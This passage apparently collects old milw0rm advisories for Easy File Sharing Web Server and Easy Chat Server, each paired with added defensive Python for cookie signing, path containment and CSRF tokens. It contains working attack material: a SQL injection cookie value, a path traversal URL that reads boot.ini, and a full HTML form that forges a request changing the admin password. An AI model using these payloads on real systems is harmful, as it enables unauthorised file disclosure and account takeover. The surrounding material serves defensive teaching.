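    "-1' UNION ALL SELECT ..." cookie is rejected on shape before any
    signature check, and a bare "1" is rejected for having no tag.
    """
    if cookie is None or cookie.count(".") != 1:
        return None
    id_part, tag = cookie.split(".")
    if not id_part.isdigit():
        return None
    expected = hmac.new(key, id_part.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected.encode(), tag.encode()):
        return None
    return int(id_part)


def is_admin(cookie, lookup_can_admin) -> bool:
    """admin.php's check done safely: verified id first, then a parameterised lookup.

    lookup_can_admin stands in for "SELECT UserCanAdmin FROM user WHERE UserID = ?".
    """
    user_id = verify_user_id(cookie)
    if user_id is None:
        return False
    return bool(lookup_can_admin(user_id))


if __name__ == "__main__":
    table = {1: 1, 2: 0}  # constructed: UserID -> UserCanAdmin
    good = sign_user_id(2)
    print(verify_user_id(good))       # 2
    print(verify_user_id("1"))        # None: no tag
    print(verify_user_id("-1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1#"))  # None
    print(is_admin(good, table.get))  # False: user 2 is not an administrator
```

The signature alone would already stop the forged "1"; the decimal-only rule is what makes the cookie safe to pass on to the database even if a later query forgets to bind it.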
# milw0rm
Easy File Sharing Web Server 4.8 File Disclosure Vulnerability
Program: Easy File Sharing Web Server
Version: 4.8
Download: http://www.sharing-file.com/efssetup.exe
Found by Mountassif Moad
www.v4-team.com
-- Bug --
Exploit:
http://127.0.0.1/disk_c/thumbnail.ghp?vfolder=../../.././/./../../boot.ini
If the host has another drive such as D: or F:, replace disk_c with disk_d
or disk_f. Some hosts do not expose this; if the first attempt does not
work, register an account and try again. Tested on Windows XP SP2 (French).
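The vfolder value above escapes the per-drive share by walking up with "../" after the server has joined it to the share root. An added example of the containment check a file-serving handler needs, not Easy File Sharing Web Server's code: the request is normalised after joining and must still lie under the root. The POSIX-style root "/srv/efs/disk_c" and the function name are assumptions; the check runs on the already URL-decoded value.

```python
import posixpath


def resolve_in_share(share_root: str, vfolder: str):
    """Absolute path for vfolder inside share_root, or None if it escapes.

    Joins first, normalises second (collapsing './', '//' and '../'), then
    checks the result is still the root or under it. The advisory's payload
    '../../.././/./../../boot.ini' normalises to /boot.ini and is rejected.
    """
    root = posixpath.normpath(share_root)
    if not root.startswith("/"):
        raise ValueError("share_root must be absolute")
    # Absolute requests and backslashes are rejected outright: a Windows
    # server also treats '\' as a separator, so normalising '/' is not enough.
    if vfolder.startswith(("/", "\\")) or "\\" in vfolder:
        return None
    candidate = posixpath.normpath(posixpath.join(root, vfolder))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    ROOT = "/srv/efs/disk_c"  # assumed share root for drive C:
    print(resolve_in_share(ROOT, "photos/2009/"))                      # /srv/efs/disk_c/photos/2009
    print(resolve_in_share(ROOT, "../../.././/./../../boot.ini"))      # None
```

normpath does not follow symlinks; where the share may contain links, apply the same prefix test to os.path.realpath of the candidate as well.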
# milw0rm
EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability
<html>
<!--
EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability
Version: 2.2
Date: Jan 11, 2007
Size: 1519KB
Download Easy Chat Server http://www.echatserver.com/ecssetup.exe
By Mountassif Moad
-->
<head>
<title>EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability</title>
</head>
<body bgcolor="#008000">
<div align="center">
<!-- Cross-site POST to the registration handler: a victim logged in as
     admin who submits this form sets the admin password to "stack". -->
<form action="http://127.0.0.1/registresult.htm" method="POST" name="regist">
<table border="2" width="250">
<tr>
<td align="center" class="title"><font color="red">Booom!!</font></td>
</tr>
<tr><td>Username:
<input type="text" name="UserName" maxlength="30" value="admin"> *
</td></tr>
<tr><td>Password:
<input type="password" name="Password" maxlength="30" value="stack"> *
</td></tr>
<tr><td>Confirm Password:
<input type="password" name="Password1" maxlength="30" value="stack"> *
</td></tr>
<tr><td>Email:
<input type="text" name="Email" value="admin@127.0.0.1.com" maxlength="30">
</td></tr>
<tr><td><br>
<textarea rows="4" cols="30" name="Resume">chi le3ba</textarea>
</td></tr>
<tr><td align="center">
<input type="submit" value="Click here to test" name="submit1">
<input type="button" value="Close" name="button1" onclick="window.close();">
</td></tr>
</table>
</form>
</div>
</body>
</html>
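The form succeeds because registresult.htm accepts any POST carrying the admin's session cookie. An added example of the server-side check that is missing, not Easy Chat Server's code: a per-session CSRF token that the legitimate form carries in a hidden field and the cross-site form cannot know, with an Origin comparison as a second line. The handler name, the in-memory session store, the hidden field name "csrf_token" and the POST body built from the PoC's fields are assumptions for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

SESSIONS = {}  # constructed, in-memory: session id -> per-session CSRF secret


def new_session() -> str:
    """Create a logged-in session and return its id (assumed cookie value)."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = secrets.token_bytes(32)
    return sid


def csrf_token(sid: str) -> str:
    """Token bound to the session; the real form renders it as a hidden field."""
    return hmac.new(SESSIONS[sid], b"registresult", hashlib.sha256).hexdigest()


def handle_registresult(sid, body: str, origin, own_origin="http://127.0.0.1"):
    """Return 'changed' or the rejection reason for a POST to /registresult.htm."""
    form = {k: v[0] for k, v in parse_qs(body).items()}
    if sid not in SESSIONS:
        return "rejected: not logged in"
    # Browsers add Origin on cross-site POSTs; a mismatch is decisive on its own,
    # but an absent header must fall through to the token check.
    if origin is not None and origin != own_origin:
        return "rejected: cross-site origin"
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), csrf_token(sid).encode()):
        return "rejected: missing or bad csrf_token"
    if form.get("Password") != form.get("Password1"):
        return "rejected: passwords differ"
    return "changed"


# The PoC's POST body as a browser would encode the form fields (constructed).
POC_BODY = (
    "UserName=admin&Password=stack&Password1=stack"
    "&Email=admin%40127.0.0.1.com&Resume=chi+le3ba"
)

if __name__ == "__main__":
    sid = new_session()
    print(handle_registresult(sid, POC_BODY, "http://evil.example"))  # rejected: cross-site origin
    print(handle_registresult(sid, POC_BODY, None))                   # rejected: missing or bad csrf_token
    legit = POC_BODY + "&csrf_token=" + csrf_token(sid)
    print(handle_registresult(sid, legit, None))                      # changed
```

The token is derived from a per-session secret rather than stored, so there is nothing for a session-fixation or a leaked table to hand over, and compare_digest keeps the check constant-time.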
# milw0rm